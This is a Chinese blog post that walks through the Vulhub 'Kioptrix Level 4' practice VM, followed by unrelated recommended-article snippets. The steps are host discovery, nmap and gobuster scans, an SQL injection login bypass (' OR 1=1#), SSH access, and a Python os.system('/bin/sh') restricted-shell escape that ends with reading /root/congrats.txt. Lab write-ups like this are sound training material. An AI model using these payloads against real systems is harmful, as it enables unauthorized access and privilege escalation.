Vulhub Kioptix Level 4

最新推荐文章于 2023-09-15 20:37:36 发布
最新推荐文章于 2023-09-15 20:37:36 发布
阅读量194 收藏
点赞数
分类专栏: VULHUB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hee_mee/article/details/106148297
版权

知识点

  • sql注入
  • 获取非受限的shell

主机发现

netdiscover

在这里插入图片描述

端口扫描

 nmap -p-   --min-rate=1000 192.168.80.5 >port
 ports=$(cat port | awk -F " " '{print $1}' | awk -F "/" '{print $1}' | sort -n | tr '\n' ',' | sed 's/[^0-9]*//')
 nmap -sC -sV -T4 -p $ports 192.168.80.5 -oA nmap/nmap

在这里插入图片描述

信息收集

gobuster dir -u http://192.168.80.5 -w /usr/share/wordlists/dirb/big.txt -t50  -o dir.out

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

john
' OR 1=1#

在这里插入图片描述
在这里插入图片描述

提权

ssh robert@192.168.80.5
  • 获取非受限的shell
echo python: exit_code = os.system('/bin/sh') output = os.popen('/bin/sh').read()

cd /root
cat congrats.txt

在这里插入图片描述

hee_mee
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
vulnhub靶机Android4渗透笔记
liver100day的博客
05-14 801
渗透测试实战-Android4 靶机下载/安装 靶机下载:https://www.vulnhub.com/entry/android4-1,233/ Android4靶机IP:未知 攻击者IP:192.168.75.128 1主机发现
VulnHub——Kioptrix Level 4
江左盟的博客
06-17 1400
简介 该靶机较前面三个麻烦些, 需要新建虚拟机,将虚拟磁盘导入。 环境配置 从官网下载压缩文件,解压后发现只有vmdk文件(虚拟磁盘文件),没有vmdx文件,因此需要新建虚拟机,选择自定义模式,安装来源选择“稍后安装”,然后在客户机操作系统选择“其他”,如图: 然后选择位置为解压后放置vmdk文件的文件夹,名称自定义,如图: 出现提示后点“继续”,设置内存为512M,如图: 然后一路默认,在选择磁盘处选择“使用现有虚拟磁盘”,然后选择vmdk文件,如图: 出现提示后选择“保持现
KIOPTRIX: LEVEL 4通关详解
arcuied
04-09 649
KIOPTRIX: LEVEL 4通关详解
Android4靶机,记一次对`vulnhub`中`Android4`靶机渗透测试全过程
weixin_29845919的博客
05-29 173
记一次对vulnhub中Android4靶机渗透测试全过程Android4靶机简介名称:Android4操作系统:Android v4.4标志:/data/root/(在此目录中)等级:初学者。搭建成功的Android平台知识点渗透过程1:获取IP地址使用命令:arp-scan -l由此我们可以看到靶机的IP地址:192.168.232.1462:扫描开放端口在此扫描中,我们将使用最流行的工具nm...
Vulnhub系列:Kioptix Level 1
Fuzz
07-30 1288
简介 Vulnhub简介 Vulnhub是一个提供各种漏洞环境的靶场平台。 个人学习目的:1,方便学习更多类型漏洞。2,为0SCP做打基础。 下载链接 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/ 运行环境 kali:192.168.44.128 靶机:NAT模式 特别说明:有的小伙伴在打开虚拟机后,无法获取到靶机IP地址 这里特别说明:修改“Kioptix Level 1.vmx”配置文件中ethernet0.networkN
盘点CSS Selectors Level4中新增的选择器
09-22
CSS 选择器在实践中是非常常用的,无论是在写样式上或是在 JS 中选择 DOM 元素都需要用到。在 CSS Selectors Level 4 中,工作组继续为选择器标准添加了更丰富的选择器。需要的朋友们下面随着小编来一起学习学习吧
2020-L1V4.pdf
02-28
2020-L1V4.pdf
logging level级别介绍
09-17
4. `Level ERROR`: 错误级别,表示发生了错误,但程序还能继续运行。这通常用于捕获并记录异常,帮助识别错误源头,但不影响用户的基本使用。 5. `Level FATAL`: 致命错误级别,意味着程序遇到了严重的问题,通常会...
日本語Level 3 Level 4
12-07
日本語Level 3 Level 4 需要大于20个字符,不支持HTML标签。
level shift电平转换芯片 18V/3V
06-08
4. onsemi公司:Level Shift电平转换芯片是由onsemi公司生产的。 onsemi公司是全球领先的半导体公司,提供了广泛的半导体产品和解决方案。onsemi公司的产品和解决方案广泛应用于各种行业,如汽车、消费电子、工业...
Vulnhub系列-Kioptix-Level-1-1
Yasso的博客
12-18 553
靶机: 192.168.249.129 kali: 192.168.249.132 一、信息收集 arp-scan -l —使用网络接口IP地址和网络掩码,生成目标主机地址列表nmap -sV 192.168.249.129 —查看开放端口 信息:Apache/1.3.20、mod_ssl/2.8.4、OpenSSL/0.9.6b nikto -host http://192.168.249.129/ —开放80、443端口,深入探测 nikto扫到CVE-2002-0082(Apache Mod_SSL
【Oscp备考-Kioptrix 1】
weixin_44126257的博客
09-13 1619
Oscp备考
Kioptix Level 1
weixin_46129372的博客
09-15 643
多试试exp。
吐血推荐珍藏的Flask资源
Python之禅的专栏
08-27 367
题图:Photo by Pathum Danthanarayana on UnsplashFlask 是 Python 中最流行的 Web 框架之一,以小巧、灵活、可扩展...
kioptrix.level1 -VulnHub靶机学习记录
weixin_45509443的博客
06-16 567
1.
docker一键安装
weixin_30858241的博客
06-04 279
1、任意新服务器上一键安装最新版docker curl -s https://get.docker.com/ | sh 注:安装完成之后,docker默认是没有启动的,需要启动docker 2、docker-compose安装 Docker-compose用于组合服务与内网。有部分环境涉及到多个容器,且不同环境开启的端口、目录也不相同,所以Vulhub选择使用docker-comp...
MPLS-VPM-BGP
liuningning00的博客
02-28 710
MPLS/VPN 配置步骤 1.在P网络中,运行普通的IGP协议 2.在P网络中,开启LDP,并开启MPLS 3.在C网络中运行普通的路由协议,并且和PE进行互联 4.在PE上创建VRF(虚拟路由表),用来区分不同的VPN路由 ip vrf vpna //创建vrf,名称为vpna route-target 100:1// 配置RT为100:1,用来影响路由在对端PE进入到相应的vrf中
财务报表,项目费用支出明细.xlsx
最新发布
08-09
工资表,财务报表,对账表,付款申请,财务报告,费用支出表 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
ppap-第四版.pdf
08-09
ppap-第四版
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值